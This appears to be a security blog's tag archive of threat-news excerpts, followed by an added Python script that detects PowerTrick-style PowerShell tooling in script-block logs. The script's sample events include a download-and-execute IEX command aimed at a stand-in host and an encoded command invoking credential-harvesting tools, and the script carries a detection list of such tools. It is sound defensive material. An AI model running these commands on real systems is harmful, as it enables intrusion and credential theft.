Traditional ransomware encrypts a victim’s data and demands a ransom payment to decrypt it. Companies are able to defend against traditional ransomware by maintaining an up-to-date secure backup so that files can be restored without paying criminals. The attackers behind…
Tag: Threat Watch – Binary Defense
Sodinokibi Operators Follow Through on Threats
After the December infection of CyrusOne, the operators of the ransomware known as Sodinokibi made it clear they weren’t happy with victims being able to successfully recover their files without paying their ransom demand. A forum post by a representative…
Silence Targeting Banks in Sub-Saharan Africa
Silence: The cybercrime group Silence has been active again, targeting financial institutions in sub-Saharan Africa. Recently, researchers have flagged thousands of notifications of attacks on major financial institutions throughout the region. The malware used, as well as the timeline of…
Maze Ransomware Operators Continue Release of Victim Data
Maze: The threat actors behind the Maze ransomware have returned to publicly releasing data stolen from victim companies. This return comes following a brief reprieve for victims after the group had lost their hosting provider. The threat group obtained a…
Emotet Returns for a New Year of Spam
As per our analysts’ assessment, Emotet has resumed operations after a holiday break on January 13, 2020. Emotet is a widespread threat to businesses and organizations that uses infected computers to send an email with malicious document attachments that will…
Ako Ransomware
It seems that every day new ransomware is targeting businesses, looking for a multi-million-dollar payday. Today is no different: a victim posted on the BleepingComputer support forums that they were infected with ransomware that had encrypted both their Windows 10 desktop…
Firefox 0-day Being Abused in the Wild
The Mozilla Foundation issued a security advisory for users of its Firefox web browser on January 8th. Originally reported to Mozilla by the security firm Qihoo 360, CVE-2019-17026 involves Firefox’s IonMonkey JavaScript Just-in-Time (JIT) compiler. A JIT compiler is responsible…
New Dustman Wiper Malware Shows Links to Iran
Iran: A new wiper malware that has been named Dustman was reportedly linked to Iran, based on the similarities it shares with previous Iranian malware ZeroCleare and the original Shamoon wiper malware. The link was made based on the common…
Lazarus Group Carries Out Continuation of Operation AppleJeus
North Korea (Lazarus Group): In 2018, Lazarus Group was linked to an operation that was dubbed “AppleJeus.” This operation was notable in that it was the first time Lazarus Group had been observed targeting macOS. Recent analysis has…
New TrickBot PowerShell Stager “PowerTrick” for High-Value Targets
Researchers from SentinelLabs have discovered a new PowerShell stager (PowerTrick) which is used by TrickBot as an interactive network exploitation shell. Along with the ability to download the DNS-based Anchor malware, this stager typically also uses PowerView, Invoke-SessionGopher, Get-GPPPassword,…
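The tool names in that excerpt (PowerView, Invoke-SessionGopher, Get-GPPPassword) are the kind of post-exploitation tooling a defender can hunt for in PowerShell script-block logs, including when the command is hidden behind a Base64 `-EncodedCommand`. The script below is an added example written for this page; it is not Binary Defense or SentinelLabs code and makes no claim about PowerTrick's actual on-disk or in-memory artifacts. The event records are constructed, and the field layout (EventID 4104 with a `ScriptBlockText` field) is assumed to mirror Windows PowerShell script-block logging; the extra PowerView cmdlet names are also an assumption, not taken from the excerpt.

```python
"""Flag PowerShell script-block log entries that reference the post-exploitation
tooling named in the PowerTrick excerpt (PowerView, Invoke-SessionGopher,
Get-GPPPassword), including inside Base64 -EncodedCommand payloads.

Added example, not code from Binary Defense or SentinelLabs. Sample events are
constructed; the EventID 4104 / ScriptBlockText layout is an assumption that
mirrors Windows script-block logging.
"""
import base64
import re

# Names from the excerpt, plus two well-known PowerView cmdlets (assumption).
SUSPICIOUS_NAMES = (
    "PowerView",
    "Invoke-SessionGopher",
    "Get-GPPPassword",
    "Get-NetUser",        # PowerView cmdlet (assumption, not from the page)
    "Invoke-Kerberoast",  # PowerView cmdlet (assumption, not from the page)
)

# powershell.exe accepts -e / -enc / -EncodedCommand followed by Base64 of a
# UTF-16LE string; operators use it to keep the real command out of plain sight.
ENCODED_RE = re.compile(r"(?:-e|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the UTF-16LE payload of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_hits(text):
    """Return the suspicious names (sorted) found in text or in its decoded payload."""
    haystack = text
    decoded = decode_encoded_command(text)
    if decoded:
        haystack += "\n" + decoded
    lower = haystack.lower()
    return sorted(name for name in SUSPICIOUS_NAMES if name.lower() in lower)


def scan_events(events):
    """Return [(RecordId, hits)] for script-block events (EventID 4104) that reference the tooling."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        hits = find_hits(ev.get("ScriptBlockText", ""))
        if hits:
            findings.append((ev["RecordId"], hits))
    return findings


def _encoded(ps):
    """Build a -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, Base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"RecordId": 2, "EventID": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString("
                        "'http://example.invalid/PowerView.ps1'); Get-NetUser -SPN"},
    {"RecordId": 3, "EventID": 4104,
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc "
                        + _encoded("Invoke-SessionGopher -Thorough; Get-GPPPassword")},
    # Wrong event type: script-block text only appears in 4104, so this is skipped.
    {"RecordId": 4, "EventID": 4103, "ScriptBlockText": "Get-GPPPassword"},
]

if __name__ == "__main__":
    for record_id, hits in scan_events(SAMPLE_EVENTS):
        print(record_id, hits)
```

Record 2 is caught on the download URL and the PowerView cmdlet it invokes; record 3 is caught only because the encoded payload is decoded before matching, which is the case a plain string match on the raw command line misses. Name matching is a first-pass filter, not a verdict: attackers rename functions, so pair it with behavioral signals such as the `DownloadString`/`IEX` pattern in record 2.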
Minnesota Hospital Suffers Data Breach
Alomere Health, a Minnesota-based healthcare provider, suffered a data breach affecting nearly 50,000 patients. This situation was caused by two employee email accounts being compromised between October 31st, 2019 and November 6th, 2019, the same day the breach was…